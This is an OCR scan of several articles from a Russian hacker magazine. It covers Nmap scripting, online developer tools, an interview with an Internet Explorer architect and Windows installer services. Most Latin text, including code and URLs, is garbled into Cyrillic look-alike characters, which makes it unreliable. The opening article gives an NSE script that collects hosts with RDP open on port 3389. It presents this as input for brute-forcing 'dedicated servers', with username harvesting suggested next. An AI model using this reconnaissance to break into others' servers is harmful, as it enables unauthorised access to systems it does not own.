Короче говоря, ІЧ5Е позволяет не только использовать 
всю мощь ІЧтар, но и автоматизировать многие действия. 
Для написания скриптов используется язык программиро- 
вания Еиа [ ѵѵѵѵѵѵ.[иа.ги ). Конечно, было бы вдвойне здоро- 
во, если бы в основе ІЧ5Е был Рубіоп (который к тому же 
использовался для создания отдельных частей сканера], 
но тут, как говорится, разработчикам виднее. С другой сто- 
роны, для Еиа, как и для Рубіо п, есть много библиотек для 
взаимодействия с различными сетевыми сервисами и про- 
токолами (подробнее во врезке); они идут вместе с ІЧтар. 

ПИШЕМ СКРИПТ ДЛЯ ИМАР 

Для создания ІЧ5Е-сценариев используется четкий и 
очень простой синтаксис. В общем виде структура любого 
скрипта состоит из нескольких элементов. 

безсгірСіоп — описание сценария; 
саСедогіез — его принадлежность к катего- 
риям ; 

аиСЕюг — автор скрипта; 

Іісепзе — описание лицензии; 
сіерепсіепсіез — указание зависимостей; 
рогЦ/Ь.озС гиіез — правила выполнения скрип- 
та; 

асСіоп — ядро скрипта, реализующее непо- 
средственно логику его работы. 

Скриптовый движок ІЧтар детально описан на птар.огд/ 
Ьоок/пзе.ЫтІ, поэтому не буду чрезмерно перегружать тебя 
теорией. Лучше сразу попробуем собрать простенький сце- 
нарий на практике. В прошлом номере у нас был материал 
«Брутим дедики по-новому», в котором мы делились новыми 
техниками в брутфорсе РЮР-серверов. Предлагаю в допол- 
нение к имеющимся разработкам добавить быстрое скани- 
рование и поиск РРБ-серверов с помощью ІЧтар. Задачей 
займется самописный ІЧ5Е-скрипт, который будет экспорти- 
ровать файл с найденными хостами для дальнейшей работы 
брутфорса. По сути это всего десяток строк кода на І_иа: 

безсгірбіоп = [ [ КБР Зегѵегз зеасЕШооІ ] ] 

аиЫзог = "X Сгоир" 

Іісепзе = "Зате аз №пар--3ее іЩДр : / /птар . 




Свежая утилита в наборе ІЧтар для срав- 
нения результатов сканирования 

огд/Ьоок/шап-1еда1 .Ылпі " 
сабедогіез = { " бізсоѵегу " } 
гедиіге " зіюгРрогС " 

рогбгиіе = зіюгРрогР . рогб_ог_зегѵісе (3389 , 
"шз-бегш-зегѵ" ) 

асбіоп = іипсСіоп (ЕюзС , рогб) 

іііе = іо.ореп ( " ір_ѵ7ІЫт_гс1р . 

СхР" , "3+" ) 

іііе : шгіРе (ЕюзР . ір . . " \п" ) 
іііе : ііазЪ. ( ) 
іііе : сіозе ( ) 

епб 

Кратко пройдемся по исходнику скрипта. В качестве кате- 
гории ІЧЗЕ-сценария используется значение "сіізсоѵегу", 
подразумевающее, что скрипт будет осуществлять иссле- 
дование сети — по большом счету это ни на что не влияет. 
Далее с помощью гедиіге мы подключили ІЧ5Е-библиотеку 
для работы с портами. Важная часть любого сценария 
— условие его выполнения. В скрипте используется либо 
правило для портов (рогігиіе], в которых перечисляются 
порты, с которыми будут осуществляться действия, либо 
правило для хостов (Ьозігиіе) . В общем смысле правило — 
это функция, возвращающая Ітие или іаізе. От этого зави- 
сит, будет выполняться основная часть скрипта, заданная 
в асбоп, или нет. В нашем случае мы используем роНтиІе 
и с помощью функции рог1:_ог_5егѵісе определяем, что 
хотим иметь дело с сервисом на порту 3389 или серви- 
сом, распознанным как тз-іегт-зегѵ. Непосредственно 
сердце сценариев, в котором определяются действия, у 
нас очень простое. Если ІЧтар распознал терминальный 
РБР-сервис или просто открытый 3389 порт, мы просто 
записываем его ІР-адрес в файл. 

Текст скрипта сохраняем в файл (например, грсІбзЕпзе] и 
размещаем в папке зсгіріз. Кстати говоря, для удобства 
разработки скриптов лучше сохранять их с расширением 
Іиа, тогда текстовые редакторы, в том числе ІЧо1:ерасІ++, 
будут подсвечивать синтаксис. Чтобы запустить скрипт, 
используется ключ "--зсгірі" или его синоним "-зС": 

шпар -іК 0 -п -РЗ 3389 -р Т:3389 
--зсгірР=грс!1ізР . пзе 

Вот так просто мы создали многопоточный РРБ -сканнер. 
Если подключить модули для работы с М5РРС, то можно 
попробовать выцепить список пользователя с удаленного 
компьютера и также экспортировать его в список. В этом 
случае, брутфорс будет осуществляться по известным име- 
нам пользователей. Настоятельно рекомендую тебе прочи- 
тать руководство по ІЧ5Е ітар.огд/Ьоок/пзе.Ыт б так как 
в умелых руках это позволит превратить в ІЧтар в универ- 
сальный и чрезвычайно эффективный и н струме нт. зл 




> іпіо 

• Если после уста- 
новки ІЧтар, ты 
задаешься вопросом: 
«А на чем бы, соб- 
ственно попробовать 
сканнер?». Смело 
используй зсапте. 
птар.огд. Этотхост 
создатели специально 
разработали для про- 
верки функциональ- 
ности сканера. 

• Для того, чтобы вы- 
полнить обновления 
скриптов, запусти 
птар с ключом 
"--5сгір1:-ирсIа1;есIЬ ,, : 
птар --зсгірі;- 
ирсІаіесІЬ 

• Послеустановки 
ІЧтар'а помимо 
самого сканера 
ты получаешь ряд 
интересных утилит. 

В недавней версии 
появиласьтулза псаС 
которая является 
улучшенной версией 
старого доброго пс. 
Среди прочих ее 
достоинств — рабо- 
та нетолько сТСР, 

но и с ЕЮР, а также 
встроенная возмож- 
ность проксирования 
через НТТР/СОІЧІЧЕСТ 
и 50СК5. Помимо 
этого ты получаешь 
утилиту для удобного 
сравнения резуль- 
татов сканирования 
-псШ.А 
с помощью проги 
пріпдты сможешь 
конструировать за- 
просы, анализировать 
ответы и измерять 
время отклика уда- 
ленной системы. 
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Полезные тулзы для девелопера в вебе 

Все началось с того, что где-то в интернет-кафе за границей мне срочно 
понадобилось скомпилировать крохотный исходник. На общественном компью- 
тере сильно не хотелось заморачиваться с установкой компилятора, поэтому 
я на удачу попробовал найти сервис, который скомпилировал бы исходник 
онлайн. И с этого момента началось. 



КОМПИЛЯТОР ОНЛАЙН 

Через пару минут я уже имел на руках скомпи- 
лированный бинарник. Помог сервис некоего 
турецкого программиста, который когда-то 
озадачился подобной проблемой и реали- 
зовал на своем сайте веб-интерфейс для 
доступа к компилятору. А чтобы пользоваться 
было еще удобнее, прикрутил компонент для 
редактирования кода. Подсветка синтаксиса, 
нумерация строк и даже автодополнения 
команд — почти маленькая ЮЕ. Собирается 



в один исходник в один клик или по хоткею 
СМ-Р7, после чего сервис отдает готовый 
бинарник. Если во время сборки произошли 
ошибки, то сообщения компилятора отобра- 
зятся в отдельной панели. Адрес для такого 
удачного сервиса на редкость странный: 
стре 150-1 .стре.Ьоип.есіиЧг/рЬрссотріІег/ 
Іоаіп.рЬр . причем сайт откроется только в 
Іпіегпеі Ехріогег. Другое серьезное ограниче- 
ние — отсутствие поддержки С++. А куда же 
сейчас без нее? Поэтому когда зашла речь о 



компиляции сорца С++, пришлось отыскать 
замену. К счастью, разработчики прогрес- 
сивного компилятора Сотеаи С/С++ на офи- 
циальном сайте сделали фронтенд, который 
выполнен как раз в виде веб-приложения 
[ ѵѵѵѵѵѵ.соппеаисотриЕпд.сотЛгѵіІоиІ: ). 
Допускается выбор различных режимов 
компиляции, версии Сотеаи, а также любые 
другие параметры, которые ты мог передать 
сборщику через командную строку. Кстати 
говоря, последние релизы Сотеаи уже под- 
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Нех-редактор на Аіах 



держивают большинство расширений С++0х 
(обновленный и модернизировнный стандарт 
С++], поддержка которого появилась сейчас в 
Ѵізиаі Зіисііо 2010. 

«Зачем вообще привязываться к какому-то 
конкретному языку», — подумали ребята из 
ібеопе ( ібеопе.сот ) и реализовали универ- 
сальный компилятор в 40 различных языков. 
Помимо С/С++ здесь поддерживаются еще 
и Оаѵа, С#, Разсаі, Ѵізиаі Вазіс . N ЕТ, все 
скриптовые языки, и даже ассемблер. Важно 
только уложиться в ограничения: 10 секунд 
на компиляцию, 5 секунд на выполнение, 256 
мегабайт памяти. Помимо этого, программа не 
сможет обращаться в Сеть и работать с фай- 
лами. Некоторых ограничений удается избе- 
жать, собрав программу с помощью другой 
онлайттулзы — собераб ( собераб.ога ). 



НЕХ И РЕ-РЕДАКТОРЫ 

Теперь обратная ситуция — бинарник есть, а 
исходника нет. Как поправить в нем пару бай- 
тов? Честно говоря, толкового НЕХ-редактора 
в онлайне я в какой-то момент найти не смог 
и лишь потом случайно наткнулся на него на 
одном из форумов, где разработчик делился 
ссылкой на свой текущий проект и интересо- 
вался, а стоит ли ему вообще его продолжать. 
Беглого взгляда на НехРазІе ( эхразіе.сот ) 
было достаточно, чтобы закричать: «Стоит!». 
Скажи, вот в каком оффлайн НЕХ-редакторе 
есть возможность коллективной работы 
нескольких людей? А здесь это возможно. 
Достаточно поделиться ссылкой на проект 
(нарпимер, ЬехразІе.сот/ѴѴѵѵѵХОДеѴ І. чтобы к 
нему мог подключиться кто-то еще. Действует 
простейшая система контроля версий — 
каждое значимое изменение необходимо 



Смотрим таблицу импорта 
ехе-шника через веб 



сохранить (закомитить). Интерфейс очень здо- 
рово выполнен на АбАХ'е, поэтому складыва- 
ется ощущение, что работаешь в самой обыч- 
ной, но очень простой программе. Не хватает 
различных фишек по анализу структуры, в 
том числе РЕ-заголовках. Последнее можно 
исправить с помощью онлайн РЕ-редактора, 
который серьезно выручил меня, когда надо 
было изменить точку входа в ехе’шнике. 

С помощью ргоѵіеѵѵ рЬрр [ рѵбазт.геѵегзе- 
епдіпеегіпа.пеі/РѴРНР.рбр ] также можно 
посмотреть секции, изучить таблицы экспор- 
та/импорта (скажем, для того, чтобы узнать, 
какие АРІ-функции вызывает утилита] и т.д. 

ДИЗАССЕМБЛЕР 

Помимо прочего, ргоѵіеѵѵ рбрр — это еще и 
дизассемблер. Допускается выбрать опции 
для дизассемблирования, а также выбрать 
цветовую схему листинга, наиболее привыч- 
ную по одной из известных программ (5оШСЕ, 
ЮА, \А/320азт, ОІІубЬд]. Но, увы, получить 
дизассемблированный код получится для 
файлов не более 100 Кб. Чтобы обойти это 
неприятное ограничение, рекомендую взгля- 
нуть на более современный сервис — Рут'з 
опііпе ОізаззетЫег ( рутз86.аррзроЕсот ). 
построенный на базе боодіе Арр Епдіпе. 
Первый плюс в том, что можешь анализиро- 
вать не только целый файл, но и отдельные 
НЕХ-дампы. Проекту по зубам 64-битные при- 



ложения, причем для анализа используются 

Компилируем азт-исходник Руібоп-библиотеки Рут ( сосіе.доодіе.сот/р/ 

рѵтзазісі ). ребіе ( собе.доодІе.сот/р/реЛІе ] и 
пеіѵѵогкх ( пеіѵѵогкх.іапі.доѵ ). которые очень 
прогрессивно развиваются. Возможно, в 
будущем мы расскажем, как собрать свой осо- 
бенный сервис для самостоятельного дизас- 
семблирования. 

РЕДАКТОР КОДА 

Но для того, чтобы написать код с нуля, одно- 
го интерпретатора мало — необходимы удоб- 
ные средства для работы кода. Одним из наи- 
более старых и известных проектов является 
Ату ЕсГііог ( ѵѵѵѵѵѵ.атѵесіііюг.сот ). Открыв стра- 
ницу, ты получаешь практически все бонусы 
обычного десктопного редактора для про- 
граммистов. Поддерживается подсветка сразу 
для нескольких языков: С, Заѵа, ЧаѵазсгірТ;, 
РНР, РуТЬоп, РиЬу оп гаііз, РиЬу, Теху, НТМБ/ 
ХМЕ-разметка. Добавляем сюда автозакры- 
тие скобок/кавычек, правильный перенос 
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строки (сразу с нужным отсупом, особенно чувствуется в РуІіЬоп) , 
набор сниппетов, упрощенную вариацию автодополнения команд и 
даже некоторые возможности для совместной работы с кодом. Даже 
сворачивание тела функции — и то работает. Увы, проект давно не 
развивается (хотя и распространяется в открытых исходниках). Зато 
семимильными шагами развиваются другие проекты: 

• Везріп от компании МогіІІа ( Ьезріп.тоЕІМаЬз.сот ) — бесподобный 
редактор кода для веб-проектов (НТМЕ/баѵаЗсгірі); 

• СобеМіггог ( тагуп.ЬаѵегЬеке.піѴсобетіггог ) — библиотека баѵаЭсгірІ 
для реализации редактора, поддерживающая работу с самыми разны- 
ми языками: баѵаЭсгірЕ ХМІ_/НТМІ_, С55, РуіЕоп, Ьиа, Ри Ьу, 5СЮ; 

• Уппасз ( ѵѵѵѵѵѵ.ѵппасз.огд ) — Етасз-подобный редактор, полностью 
выполненный на А)ах. 

Все три проекта — исключительно качественные современные редак- 
торы кода и распространяются в открытых исходниках. Да, можно 
поставить любой из них у себя, но зачем, если есть сервис Кобіпдеп. 



ПОЛНОЦЕННАЯ ШЕ 

Ребята из Кобіпдеп, задумавшие реализовать полноценную среду 
разработки в вебе, выбрали очень правильный сценарий развития. 
Вместо того чтобы изобретать велосипед, разрабатывая еще один 
редактор кода, который претендовал на универсальность, они про- 
сто встроили имеющиеся замечательные разработки в свой про- 
дукт! А сами тем временем сосредоточились на создании других 
необходимых для ЮЕ опций, в том числе для совместной работы! 
Сервис находится в состоянии активного развития и носит статус 
беты, а разработчики каждый месяц подкармливают появившую- 
ся армию поклонников новыми фишками. Уже сейчас над любым 
проектом можно работать в команде. И если на текущем этапе 
соІабогаЕоп поддерживается только средствами самого сервиса, то 
на подходе поддержка всех популярных систем для контроля вер- 
сий: зѵп, дб, тегсігиаі! Уже сейчас можно прописать у себя в про- 
филе учетные записи для доступа к хостингу по ЕТР и сразу зали- 
вать обновленные сорцы на сервер. А хочешь — можешь хоститься 
прямо в Кобіпдеп. Всем желающим создатели предоставляют 
хостинг в своем облаке (по крайней мере, пока). Еще одна интерес- 
ная опция — шелл-доступ своим файлом прямо из веб-интерфейса, 
не надо даже коннектиться по 55Н! Одним словом — супервещь! 



ѴІЗІІМ ЗШШО В ВЕБЕ 

Если посмотреть на поддержку языка программирования, то везде 
сплошные РегІ/РуЮоп/РНР — в общем, скриптовые языки. А как 
быть, скажем, с С#? Неужели нельзя с помощью веб-интрумента соз- 
дать полноценное веб-приложение, используя наработки МісгозоЕ:? 
Можно! Соревноваться с ѴізиаІ Эіибіо в рамках веба замахнулись 
три израильских программиста, основавшие проект собегип ( ѵѵѵѵѵѵ. 
собегип.сот ). И ведь сделали. Уже сейчас в привычном тебе по 



Ѵізиаі 5ЕисІ іо виде, то есть с очень похожим интерфейсом, подсвет- 
кой синтаксиса и даже ІпІеШЭепзе, ты можешь создавать А5Р.ІЧЕТ, 
РНР, А] а х , а также виндовые приложения на ѴѴРЕ прямо в браузере! 
Поддерживаются С#/.І\ІЕТ (3.5), РНР (5.1), баѵаЭсгірЕ НТМЕ и С55. 
Причем для С# реализована поддержка всех модных технолоий 
МісгозоЕ:: А5Р.ІМЕТ, ѴѴСЕ, ЗіІѵегІідЫ: и ѴѴРЕ. В качестве баз данных 
можно нативно использовать ЗОЕ Зегѵег 2005 и Атагоп ЗітрІеОВ. 

Это значит, что не надо изучать ничего нового. Если у тебя есть про- 
ект на А5Р.ІЧЕТ и ЗОЕ Зегѵег, можешь залить его на собегип и запу- 
стить. Стоп, что значит «запустить»? Да-да, собегип поддерживает 
компиляцию для ,І\ІЕТ управляемого кода, для этого используются 
мощности серверов из облака. Мало того, сервис обладает еще и 
мощным онлайн-дебаггером. Ты можешь последовательно трей- 
сить код, устанавливать ѵѵаІсЕ'и, чтобы наблюдать за переменными, 
изучать саІМаск — почти фантастика. Вот она — первая заявка на 
настоящую ЮЕ в браузере. Правда, справедливости ради надо ска- 
зать, что реально использовать собегип пока довольно сложно. В 
глаза довольно часто бросаются недоделки, а скорость работы подчас 
катастрофически падает. 




ДЕЛИМСЯ КОДОМ 

Если редактировать код вместе не нужно, а нужно поделиться 
исходниками, какими-нибудь конфигами, ХМИ-ками, дампами или 
просто текстовыми файлами, пригодится инструмент, о котором мы 
недавно говорили в ѴѴѴѴѴѴ2 — РазЕе ( разЕе.огд ). Все, что требуется 
— это скопипастить в форму текст и указать его тип (скажем, исход- 
ник на С++ или РуЕіоп]. Сервис выдаст короткий линк, перейдя по 
которому, любой увидит исходный текст с красиво подсвеченным 
синтаксисом. Всего сервис поддерживает 38 различных языков 
программирования, файлов-конфигураций и вывода некоторых 
программ. Во время просмотра можно изменить тему для отобра- 
жения так, чтобы было максимально похоже на привычную среду 
разработки. Сам проект написан на Р и Ьу, причем правила для под- 
светки синтаксиса были позаимствованы у ТехіМаІе. Помимо РазЕе 
есть еще один интересный сервис, нацеленный на обмен сниппе- 
тами. В публичном репозитории кода Зпірріг хранится огромное 
количество исходников и сниппетов на разные темы. Обязательное 
требование к заметке — четкое описание и теги, поэтому в репози- 
тории очень легко найти нужные участки кода. 



РЕГУЛЯРНЫЕ ВЫРАЖЕНИЯ БЕЗ БОЯ 

Существует довольно много программ для быстрого составления 
регулярных выражений, например, ВедехВиббу. В онлайне такие 
решения тоже есть. Правда, по большей части это простые сер- 
висы для проверки регеспов, причем строго определенных типов. 
Из толпы выдется очень добротная онлайн-тулза ПедЕхг ( ѵѵѵѵѵѵ. 
дзкіппег.сот/ПедЕхг ). реализованная в виде ЕІех-приложения. 



► 032 



ХАКЕР 06 /137/ 10 





в 



Всем фанатам Егпасз посвящается 



Жсу 

І*Ы* сеі I **мс ~ ЫПрвіМІпч- п Ьогйіг* \і ■ 

Іг сІліз-’зиЫііЫиГ іІіцт^ЧеіЧ , іК-*1к.ѵа1іи 
~рЬщ> і-сі лз - ‘погж»1*і 7> 

сТ*і=- "<7|Яір ясіжі (л*Нр*сіа1сН*гі(»іІлхз) "»">ч±іЬ 
’рітр Іѵмн - ІИП(ІЛП(4’ »_ікгтеа (1и«С»ГП^ 
’рйр («г««Ь СІѴАЯ 5 « {гі*е>- ЦѵіііілЭ [ 



"р-Нр «сію НгіиІіресіІіІсНшг 



} 



В чем ее фишка? Благодаря Ріех'у удалось сделать 
очень удобный и быстрый интерфейс. Ты можешь 
писать регулярное выражение в одном поле и тут 
же в реальном времени отслеживать, как оно рабо- 
тает в другом. Для любой конструкции выводится 
описание того, что она делает и как используется. 

В результате регулярку могут составить даже те, кто 
вообще не знает теории. Мало того, при наведении 
на любой из элементов регеспа сервис отображает, 
что именно он делает. Обалденная опция на случай, 
если необходимо разобраться, что делает громоздкое 
выражение, которое когда-то давно составил ты сам 
или вообще другой человек. Любое выражение можно 
сохранить на потом, добавив ее во внутреннюю базу 
РедЕхг'а. Благодаря этой возможности в базе даже 
сейчас есть большое количество готовых регеспов 
на многие случаи жизни. А значит, вместо того чтобы 
ковыряться самому, можно взять уже готовое чужое 
решение, отыскав его по ключевым словам, а потом 
сразу же проверить в действии с нужными входными 
данными. Кстати говоря, большая библиотека регу- 
лярных выражений также располагается на ѵѵѵѵѵѵ. 
гедехШэ.сот . 

ОНЛАЙН, ОБЛАКО, ГОЕ 

В этот перечень я намеренно не стал включать 
инструменты для общения разработчиков внутри 
команды, а также планирования проектов. Их 
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Репозитарий готовых сниппетов на многих 
языках программирования 



очень много, они разные и чаще всего платные. Я 
же уверен, что в большинстве случаев можно не 
строить умные диаграммы и графики, а воспользо- 
ваться простой системой для управления задачами 
вроде Театег'а ( ѵѵѵѵѵѵТеаппег.ги ). В любом случае у 
нас есть отдельный повод поговорить об инстру- 
ментах планирования времени и управления зада- 
чами. Если тебе интересны способы увеличения 
эффективности, пиши нам! :) т 
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ЗНАКЕ ЗЫІРРІК 



| ІЫРО I 1 

> іпіо 

• Эмуляция РуіЬоп- 
интерпретатора, при- 
чем реализованная на 
ЭіІѵегІідЫ:, доступна 
на сайте Тгу Руібоп 
( ѵѵѵѵѵѵТгѵрѵіЬоп.огд ). 

А благодаря ІЛіІіІу 
М ІИ [ ибіііутіи.сот і, 
из Руібоп-скрипта 
можно легко сделать 
веб-сервис. 

• Зашить файлы на 
РТР-сервер также 
легко через веб. Для 
этого пригодится 
клиент пеі2^р [ ѵѵѵѵѵѵ. 
пеі2Кр.сот 1. 

Специально для РНР 
есть еще одна доброт- 
ная ІОЕ в бразуере 
— это рбрАпуѵѵаге 
[ рЬрапуѵѵЬеге.пеІ І. 
Среда поддерживает 
загрузку файлов РТР, 
имеет подсветку син- 
таксиса и в будущем 
о б е ща ет а втодо п о л - 
нение команд. 
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№ Іпіегпеі ЕхрІогегЭ 



Ф Іпіегпеі ЕхрІогегЭ 



I СТЕПАН «5ТЕР» ИЛЬИН ТѴѴІТТЕР.С0М/5ТЕРАН 




Ш Іпіегпеі ЕхрІогегЭ 



Ш Гпіетеі ЕхрІогегЭ 

® іпіегпеі ЕхрІогегЭ ® ГпЙгпеі ЕхрІогегЭ 

Гпіеігіеі ЕхрІогегЭ 



& ГпіетеІ ЕхрІогегЭ 



® Іпіетеі ЕхрІогегЭ 

& Іпіегпеі ЕхрІогегЭ 

Й Іпіегпеі ЕхрІогегЭ 



® Іпіегпеі ЕхрІогегЭ 





Алекс Могилевский — один 
из архитекторов Іпіегпеі Ехріогег 



Когда каждый второй номер ругаешь Іпіегпеі Ехріогег, 
хочется посмотреть в глаза тому человеку, кто этот браузер 
делает. Я посмотрел! :) В апреле в Москву прилетел Алекс 
Могилевский - один из архитекторов ІЕ и специалистов 
по стандартам, который предлагает и утверждает техно- 
логии в рамках своей работы в консорциуме ѴѴЗС от имени 
Місгозоіі. Я решительно настроился помучить Алекса 
по поводу новой версии Іпіегпеі Ехріогег, и вот что он мне 
рассказал. 



ПРО ОСНОВНЫЕ АСПЕКТЫ 

Самый большой акцент в новой версии ІЕ 
мы делаем на улучшение производитель- 
ности и поддержку стандартов. Если посмо- 
треть Іпіегпеі Ехріогег Ріаііогт Ргеѵіеѵѵ (іег 
тісгозоіі.сот/іезісігіѵе ). то можно уже сейчас 
оценить, насколько шустрее работают страни- 
цы со сложной графикой. Это стало доступным 
засчет 0ігесі20 и прямого использования 
ОРЕІ. Помимо этого мы полностью переписали 
движок ЭаѵаЗсгірІ. Что касается поддержки 
стандартов, то в этой версии мы реализуем 
практически все, что хотят люди при создании 
сайтов: С553, объектную модель, 5ѴС, многие 
вещи из НТМЕ5. 

ПРО ПРОИЗВОДИТЕЛЬНОСТЬ 

Есть много способов сделать браузер медлен- 
ным :]. Для того, чтобы сделать его быстрее, 
необходимо изучить те моменты, которые при 
выполнении страниц требуют много времени. 
Например, один из важных вопросов при 
выполнении Эаѵазсгірі — когда и какую часть 
скрипта компилировать. Скомпилированный 
скрипт работает быстрее, но компиляция 
занимает время. Если ничего не компилиро- 
вать, то скрипт без циклов работает быстро, а 
с циклами — медленно. Если каждая строчка 
выполняется только один раз, то компиля- 
ция — это пустая трата времени. Такого рода 
решения влияют на производительность 
реальных сайтов. Для ІЕ9 мы с нуля пере- 
писали обработку ЧаѵаЭсгірІ. Новый движок 
называется СЬакга. Он использует сильно 
оптимизированный доступ к объектной моде- 
ли, а также компиляцию в бэкграунде — это 
дает ощутимый результат. Бенчмарк ЭипЭрібег 
показывает, насколько быстрее стал ІЕ9 по 



сравнению с ІЕ8. Но по результатам того же 
теста ІЕ медленнее, чем СЬготе или Орега. 

Тут важно понимать одну вещь: любой тест, 
как бы правильно он ни был составлен, все 
равно сильно отличается от реального мира. 
Мы пробовали играться с параметрами, но, 
выигрывая в тестах ЭипЭрібег, получали более 
медленное выполнение реальных страниц. 

ПРО АСШ И ДРУГИЕ ТЕСТЫ 

Показателем поддержки стандартов многие 
считают тест АС ЮЗ, но у ІЕ9 в нем результат 
пока небольшой. Открою секрет. И АСЮ 2, и 
АСЮЗ — это очень интересные тесты, которые 
на самом деле мало что полезного тестируют. 
Большинство из этих стандартов, поддержка 
которых проверяется — это лишь развиваю- 
щиеся технологии, немногие из которых имеют 
статус официальных. Таким образом, АСЮЗ 
проверяет скорее не поддержку стандартов, а 
поддержку неких трендов — тех вещей, кото- 
рые возможно когда-нибудь будут стандарти- 
зованы. Пройдет ли ІЕ9 на АСЮЗ 100%? Не 
могу сказать. Мы не пытаемся подогнать брау- 
зер для корректной работы в этом тесте. Когда 
мы зарелизим ІЕ9, результат будет приближен 
к максимуму, но если какие-то тесты браузер 
не будет проходить, то только потому, что мы 
не согласны, что этого стандарта необходимо 
придерживаться, либо этот стандарт еще не 
стал официальным. Когда мы разрабатывали 
ІЕ8, то только для проверки С55 мы создали 
более 8000 тестов. 

ПРО БЕЗОПАСНОСТЬ 

Понятно, что в программе из многих мил- 
лионов строк можно найти проблемы. Да, в 
браузерах бывают ошибки, и да, некоторые из 



этих ошибок могут быть использованы хаке- 
рами. У нас есть профи, которые специализи- 
руются именно на безопасности. Если какой- 
то программист пишет код и говорит, что в 
этом месте ну никак не может быть ошибки, 
эти ребята быстро объясняют ему, как этот 
«безопасный код» будет взломан. Большая 
головная боль — ІЕ6. Он был хорош для свое- 
го времени, но когда это было? Мы говорим: 
«Перестаньте, пожалуйста, использовать I Е 6 » . 
В конце концов, поставьте СЬготе, а потом 
уж с него переключайтесь на Іпіегпеі; Ехріогег 
:). К сожалению, мы не можем прийти и 
насильно поставить на ваш компьютер дру- 
гой браузер — многие приложения заточены 
именно под 6-ую версию ІЕ. Кстати, Іпіегпеі 
Ехріогег 9 не будет работать в ѴѴіпсІоѵѵз ХР; 
помимо прочего это связано с безопасно- 
стью. В этой версии ѴѴіпсІоѵѵз невозможно 
использовать БЕР и А5БР. Другая важная 
причина — отсутствие Бігесі2сІ, то есть невоз- 
можность использования графического уско- 
рения. 

ПРО ЧЕЛОВЕЧЕСКИЙ ПОДХОД 

Какое-то время над ІЕ в Місгозоіі работали 
мало, а наши конкуренты трудились интен- 
сивно. Я надеюсь, что сейчас мы научились 
слушать людей, и сейчас делаем все, что дей- 
ствительно нужно. В новой версии появится 
инструменты для разработчика: например, 
ІМеІѵѵогк Мопііогіпд уже есть в превью. Это не 
то же самое, что Ріббіег ( ѵѵѵѵ\л/.ІісІсІІег2.сопп ). но 
близко к тому. Нажимаешь кнопку — и видишь 
весь пеіѵѵогк-график, с временным тестами, 
с графиками. Все это можно посмотреть и 
проанализировать. Когда выйдет релиз? Не 
скажу, давайте дождемся беты. -г 
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ѵѵѵѵѵѵ.гіпаОсіш.ги 



Хак-квесты журнала 



іасеЬоок.сот дМ=326597299563 
Группа на ГасеЬоок 





. ...іеджер .... . 

пакетов для ѴѴіпаоѵѵз 

Быстрая установка и обновление программ 



Когда-то давно установка программы в Ыпих превращалась в целый обряд. 
Мало было найти и скачать исходник, необходимо было его вручную собрать, 
удовлетворив ненавистные зависимости. Теперь не надо даже качать 
дистрибутив - достаточно выбрать программу в менеджере пакетов и нажать 
на кнопку «Установить». В винде же по-прежнему приходится самому искать 
дистрибутивы и потом вручную устанавливать софт. Факт! 



сть множество причин, почему Місго- 
зоіі не реализовала ничего схожего 
с менеджером пакетов. Обсуждать 
этот вопрос можно довольно долго, но 
зачем? Занятие это неблагодарное и 
едва ли полезное. Вместо этого предлагаю 
заняться делом и попробовать обустроить 
систему, сродни той, что используется в 



любом современном Ыпих’е. Менеджер 
пакетов позволяет быстро найти и установить 
приложения, позже установить апдейты, а в 
случае необходимости — правильно удалить 
софт. Задача ясна, и раз уж в винде нет ничего 
подобного, то реализуем что-нибудь подобное 
сторонними средствами. 



ПЕРВИЧНАЯ УСТАНОВКА СОФТА 

Нет ничего более утомительного и скучно- 
го, чем первичная установка программ на 
девственно чистую систему. Нет, правда! 

Даже если не бросаться с места в карьер, 
устанавливая сразу весь необходимый софт 
(хотя есть и такие фетишисты], а делать это 
постепенно, то все равно базовый набор прог, 
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Выбираем программы для создания универсального инсталлятора 



без которых ну никак не обойтись, все равно 
заставит почувствовать себя станочником 
третьего разряда. Три операции: «Открыл 
сайт», «скачал дистрибутив», «поставил 
программу» — и так двадцать раз за смену. 
Браузер, мессенджер, кодеки и аудио/видео 
проигрыватель, читалка для РБЕ, офисный 
пакет, антивирус, последние версии Заѵа/. 
І\ІЕТ Егатеѵѵогк/БІазЬ, архиватор — джентль- 
менский набор никто не отменял. Тут и за 
целую рабочую смену можно не управиться! :) 
Есть вероятность свалить пораньше, если под 
рукой есть Оаііузой с последнего диска ][, но 
так и брак пропустить можно: а вдруг новая 
версия вышла? Словом, единственный вари- 
ант — послать эту тягомотину лесом и искать 
вариант лучше. 

Итак, добавляй в закладки онлайн-сервис 
ѵѵѵѵѵѵ.пітіе.сот . Этот недавно появившийся 
ресурс уже успел избавить меня от несколь- 
ких часов мучений и бездарного времяпре- 
провождения. Как? Идея очень проста. На 
единственной странице доступен список 
различных преимущественно бесплатных 
или открытых приложений, который разбит 
по группам: «Браузеры», «Безопасность», 
«Разработка» и т.д. От тебя требуется 
выбрать нужные утилиты и нажать на кнопку 
«6еІ I пзЕа Пег». В результате за несколько 
кликов мыши мы получаем универсальный 
инсталлятор, который разом установит все 
выбранные программы. Сам установщик 
весит совсем немного и подкачивает все 
необходимые данные прямо во время уста- 
новки. Отдельные моменты, конечно, насто- 
раживают. Например, кто его знает, что зака- 
чивает этот установщик? Но ведь как удобно! 
К сожалению, инсталлятор не оставляет дан- 
ные, которые скачал для установки, поэтому, 
увы, не получится создать оЖіпе-установщик 



и записать его себе на флешку, но такая 
опция доступна в платной версии сервиса. 

ПРОКАЧИВАЕМ ИДЕЮ 

Помимо отсутствия оффлайн-установки в бес- 
платной версии N іпіііе есть еще один недоста- 
ток — инсталлятор с нужными приложениями 
каждый раз приходится составлять заново. 
Странно, что разработчики не добавили прос- 
тейшую систему регистрации, чтобы можно 
было залогиниться и сразу скачать инстал- 
лятор для когда-то уже составленного набора 
программ. Избежать подобной оплошности 
удалось парням из Франции, которые реали- 
зовали аналогичный сервис — ѵѵѵѵѵѵ.аиппѵаррз. 
сот . По сути это тот же ІЧіпіІе, только с еще 
большим количеством софта и возможностью 




Пока одни программы устанавли- 
ваются, ЫіпНе закачивает другие 




Сохраненный джентельменский 
набор аіітуаррз 

прилинковать список приложений к своему 
личному аккаунту (регистрация бесплатная]. 
Помимо того в системе можно установить 
дополнительный десктопный клиент, после 
чего в интерфейсе АИтуаррз будут отмечены 
утилиты, которые уже имеются в системе и не 
нуждаются в установке. Впрочем, даже при 
таком раскладе универсальный инсталлятор — 
это все же не менеджер пакетов. 

Чуть приблизиться к идее менеджера при- 
ложений позволяет 2еиАРР [ Ыод.геизоіі.пеі/ 
геиарр ]. реализованный в виде десктопного 
приложения. Разработка также предлагает 
широкий список бесплатных и открытых прог- 
